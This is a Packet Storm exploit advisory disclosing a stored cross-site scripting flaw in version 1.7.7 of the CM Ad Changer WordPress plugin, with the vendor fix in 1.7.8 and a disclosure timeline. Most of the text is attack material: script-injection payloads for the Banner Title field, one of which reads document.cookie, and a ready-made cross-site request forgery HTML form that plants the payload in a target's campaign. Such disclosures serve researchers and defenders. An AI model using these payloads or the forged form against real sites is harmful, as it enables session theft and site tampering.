WordPress CM Ad Changer plugin version 1.7.7 suffers from a cross site scripting vulnerability.
c0be27eebca044470644e7a969b0287dff5a39a5a9e9b7408c2acf09861d5431#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip
(Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications
Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under
which an Unprivileged user can Trigger a Stored XSS to perform malicious
action or any attacker could send a Crafted link which can trigger Stored
XSS
Steps to Produce:
1) Go to CM Ad changers -> Campaigns
2) Create a Campaign. Enter whatever you want in Campaign settings, in the
next tab "Campaign Banners", select an Image in Campaign images and in
Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>
3) Enter Save & Payload triggers everytime you Return.
Attacker Can Make a Payload File containing the following:
<html>
<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer
1.7.7 </h1>
<form action="
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"
method="POST">
<input type="hidden" name="campaign_id" value="1" />
<input type="hidden" name="title" value="Hacked by Aaditya" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="link" value="" />
<input type="hidden" name="status" value="on" />
<input type="hidden" name="banner_display_method" value="selected" />
<input type="hidden" name="banner_filename[]"
value="yourpicvalue.jpg" />
<input type="hidden" name="banner_title[]"
value="</script><script>confirm(/aaditya/)</script>" />
<input type="hidden" name="banner_title_tag[]" value="" />
<input type="hidden" name="banner_tag[]" value="" />
<input type="hidden" name="banner_link[]" value="" />
<input type="hidden" name="banner_weight[]" value="0" />
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg"
/>
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This will Trigger Stored XSS at banner_title Parameter.
It has been fixed and Version 1.7.8 Released on 9th June
Visit Here:
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes
---------Timeline----------
1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8
Regards,
Aaditya Purani
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed